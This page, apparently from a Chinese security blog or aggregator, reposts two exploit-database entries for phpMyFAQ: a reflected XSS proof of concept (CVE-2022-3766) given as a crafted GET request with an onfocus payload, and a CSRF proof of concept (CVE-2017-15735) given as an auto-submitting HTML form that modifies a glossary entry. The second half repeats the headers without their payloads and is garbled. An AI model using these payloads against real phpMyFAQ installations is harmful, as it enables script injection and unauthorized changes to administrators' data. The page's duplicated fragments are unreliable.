phpMyFAQ 3.1.7 反射型跨站脚本(XSS)漏洞利用详情

Sun, 11 Jan 2026 18:32:19 +0800

Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)

Date: 2025-11-25

Exploit Author: CodeSecLab

Vendor Homepage: https://github.com/thorsten/phpmyfaq/

Software Link: https://github.com/thorsten/phpmyfaq/

Version: 3.1.7

Tested on: Windows

CVE : CVE-2022-3766

Proof Of Concept

GET http://phpmyfaq1/index.php?action=main&search=%22%20onfocus%3D%22alert%281%29

Additional Conditions:

确保没有安全机制（如Web应用防火墙）阻止特定的请求模式。
应用程序必须运行phpMyFAQ 3.1.8之前的版本。

Steps to Reproduce

登录 phpmyfaq。
发送上述请求。
观察结果。

phpMyFAQ 2.9.8 CSRF漏洞技术分析与利用证明

Sat, 06 Dec 2025 21:51:19 +0800

Exploit标题：phpMyFAQ 2.9.8 跨站请求伪造（CSRF）

日期：2024-10-26

漏洞利用作者：CodeSecLab

供应商主页：https://github.com/thorsten/phpMyFAQ

软件链接：https://github.com/thorsten/phpMyFAQ

版本：2.9.8

测试平台：Ubuntu Windows

CVE：CVE-2017-15735

概念验证：在保持登录状态的同时，打开另一个浏览器窗口：

<html>
   <body>
      <form action="http://phpmyfaq/admin/index.php?action=updateglossary" method="POST">
         <input type="hidden" name="id" value="1">
         <input type="hidden" name="item" value="Malicious Glossary Item">
         <input type="hidden" name="definition" value="This is a malicious definition.">
         <input type="submit" value="Submit request">
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>

部分细节：

PhpMyFAQ on 办公AI智能小助手

phpMyFAQ 3.1.7 反射型跨站脚本(XSS)漏洞利用详情

Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)

Date: 2025-11-25

Exploit Author: CodeSecLab

Vendor Homepage: https://github.com/thorsten/phpmyfaq/

Software Link: https://github.com/thorsten/phpmyfaq/

Version: 3.1.7

Tested on: Windows

CVE : CVE-2022-3766

Proof Of Concept

Additional Conditions:

Steps to Reproduce

phpMyFAQ 2.9.8 CSRF漏洞技术分析与利用证明

Exploit标题：phpMyFAQ 2.9.8 跨站请求伪造（CSRF）

日期：2024-10-26

漏洞利用作者：CodeSecLab

供应商主页：https://github.com/thorsten/phpMyFAQ

软件链接：https://github.com/thorsten/phpMyFAQ

版本：2.9.8

测试平台：Ubuntu Windows

CVE：CVE-2017-15735